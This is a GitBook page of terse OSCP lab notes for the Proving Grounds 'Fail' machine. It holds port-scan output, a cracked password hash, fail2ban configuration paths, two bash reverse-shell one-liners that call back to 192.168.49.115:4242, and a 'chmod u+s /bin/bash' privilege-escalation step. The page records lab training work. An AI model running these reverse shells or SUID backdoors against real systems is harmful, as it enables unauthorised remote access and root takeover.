OSCP + CTF
  • Windows Privilege Escalation
  • Most Important Links
  • Tooling
    • Apache
    • Windows Basic Recon
    • Find
    • Recon
    • DNS
    • Socat
    • Fave sql Injection
    • Xterm setup
    • Powershell Shells
    • Powershell General Info
    • Powercat
    • Fucking SMB
    • Fucking LDAP
    • Tunneling + Pivoting
      • Chisel
    • Powershell
  • Web CTF
  • General Helpful Links
  • Music OBVI
  • MySQL Privilege Escalation
  • sudo -l
  • phpMyAdmin
  • Squid 🦑
  • OSCP Labs
    • Assembling The Pieces
    • 10.11.1.101
    • 10.11.1.14
    • 10.11.1.141
    • 10.11.1.252
    • 1011.1.35
    • 10.11.1.237
    • 10.11.1.71
    • 10.11.1.50
  • HTB
    • Agile
  • OSCP Proving Grounds
    • Template
    • Authby
    • Nibbles
    • Fail
    • CTF1
Powered by GitBook
On this page

Was this helpful?

  1. OSCP Proving Grounds

Fail

Last updated 1 year ago

Was this helpful?

Not shown: 998 closed tcp ports (conn-refused)

PORT STATE SERVICE

22/tcp open ssh

873/tcp open rsync

wget "" -o linpeas.sh

fox:f1bddf02cd53fab415c1b46853072f6a

f1bddf02cd53fab415c1b46853072f6a:figa

Group fail2ban:

/etc/fail2ban/action.d

/etc/fail2ban/action.d/firewallcmd-ipset.conf

/etc/fail2ban/action.d/nftables-multiport.conf

/etc/fail2ban/action.d/firewallcmd-multiport.conf

/etc/fail2ban/action.d/mail-whois.conf

/etc/fail2ban/action.d/ufw.conf

#)You_can_write_even_more_files_inside_last_directory

bash -i >& /dev/tcp/192.168.49.115/4242 0>&1

sh -i >& /dev/udp/192.168.49.115/4242 0>&1

e8a7fd956f6c6192c033ebab14ce5ac3

Fail2ban privesc

:)

chmod u+s /bin/bash

Links

http://192.168.49.115:80/linpeas.sh
https://hackmd.io/@tahaafarooq/privilege-escalation-fail2ban
873 - Pentesting RsyncHackTricks - Boitatech
873 - Pentesting RsyncHackTricks
Privilege Escalation With fail2ban - HackMDHackMD
Logo
Logo
Logo